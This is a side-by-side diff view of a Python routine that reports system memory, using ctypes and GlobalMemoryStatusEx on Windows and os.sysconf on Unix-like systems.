3708 byref,
3698 sizeof,
3709 sizeof,
3699 windll,
3710 windll,
3700 )
3711 )
3701
3712
3702 class MEMORYSTATUSEX(Structure):
3713 class MEMORYSTATUSEX(Structure):
3703 _fields_ = [
3714 _fields_ = [
3704 ('dwLength', DWORD),
3715 ('dwLength', DWORD),
3705 ('dwMemoryLoad', DWORD),
3716 ('dwMemoryLoad', DWORD),
3706 ('ullTotalPhys', DWORDLONG),
3717 ('ullTotalPhys', DWORDLONG),
3707 ('ullAvailPhys', DWORDLONG),
3718 ('ullAvailPhys', DWORDLONG),
3708 ('ullTotalPageFile', DWORDLONG),
3719 ('ullTotalPageFile', DWORDLONG),
3709 ('ullAvailPageFile', DWORDLONG),
3720 ('ullAvailPageFile', DWORDLONG),
3710 ('ullTotalVirtual', DWORDLONG),
3721 ('ullTotalVirtual', DWORDLONG),
3711 ('ullAvailVirtual', DWORDLONG),
3722 ('ullAvailVirtual', DWORDLONG),
3712 ('ullExtendedVirtual', DWORDLONG),
3723 ('ullExtendedVirtual', DWORDLONG),
3713 ]
3724 ]
3714
3725
3715 x = MEMORYSTATUSEX()
3726 x = MEMORYSTATUSEX()
3716 x.dwLength = sizeof(x)
3727 x.dwLength = sizeof(x)
3717 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3728 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3718 return x.ullAvailPhys
3729 return x.ullAvailPhys
3719
3730
3720 # On newer Unix-like systems and Mac OSX, the sysconf interface
3731 # On newer Unix-like systems and Mac OSX, the sysconf interface
3721 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3732 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3722 # seems to be implemented on most systems.
3733 # seems to be implemented on most systems.
3723 try:
3734 try:
3724 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3735 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3725 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3736 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3726 return pagesize * pages
3737 return pagesize * pages
3727 except OSError: # sysconf can fail
3738 except OSError: # sysconf can fail
3728 pass
3739 pass
3729 except KeyError: # unknown parameter
3740 except KeyError: # unknown parameter
3730 pass
3741 pass
General Comments 0
You need to be logged in to leave comments. Login now